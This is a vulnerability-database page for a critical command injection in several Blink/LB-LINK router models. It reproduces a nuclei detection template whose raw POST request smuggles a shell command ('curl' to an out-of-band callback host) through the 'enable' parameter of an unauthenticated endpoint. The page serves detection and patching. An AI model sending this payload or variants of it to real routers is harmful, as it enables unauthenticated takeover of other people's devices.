Lucene search
K

Blink Router - Command Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Critical command injection vulnerability exists in multiple Blink Router models via bs_SetSSIDHide function.

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the bs_SetSSIDHide() function in the libshare-0.0.26.so library of the LB-LINK router software allows a attacker to execute arbitrary commands.
18 Jun 202500:00
bdu_fstec
Circl
CVE-2025-45985
13 Jun 202511:33
circl
CNNVD
LB-LINK多款产品 安全漏洞
13 Jun 202500:00
cnnvd
CVE
CVE-2025-45985
13 Jun 202500:00
cve
Cvelist
CVE-2025-45985
13 Jun 202500:00
cvelist
NVD
CVE-2025-45985
13 Jun 202512:15
nvd
OSV
CVE-2025-45985
13 Jun 202512:15
osv
Positive Technologies
PT-2025-25405 · Blink · Bl-Wr9000 +7
12 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-45985
15 Jun 202500:21
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2025-45985
23 Sep 202500:00
vulncheck_kev
Rows per page
id: CVE-2025-45985

info:
  name: Blink Router - Command Injection
  author: darses
  severity: critical
  description: |
    Blink routers BL-WR9000 V2.4.9 , BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain a command injection vulnerability via the bs_SetSSIDHide function.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the enable parameter in the set_hidessid_cfg endpoint, achieving complete device compromise.
  remediation: |
    Upgrade Blink router firmware to the latest version that properly sanitizes command parameters.
  reference:
    - https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_enable%20Unauthorized%20command%20injection/LB-LINK_enable%20command%20injection.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-45985
    cwe-id: CWE-77
    epss-score: 0.07116
    epss-percentile: 0.93454
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="B-LINK"
  tags: cve,cve2025,b-link,rce,router,vkev,vuln

http:
  - raw:
      - |
        POST /goform/set_hidessid_cfg HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{RootURL}}
        Referer: {[RootURL]}/admin/more.html
        Cookie: platform=0; user=admin

        type=sethide2&enable=";curl {{interactsh-url}};"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"type":'
          - '"result":'
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 480a00453043022036aa18768a6464158ae8a448200becd8f1956c4c906c73b700c1ad10a5281c8a021f0dd913d78882eefce91ed44407e3469baa241a410f51b3d3873a40a464ee4c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.07116
SSVC
12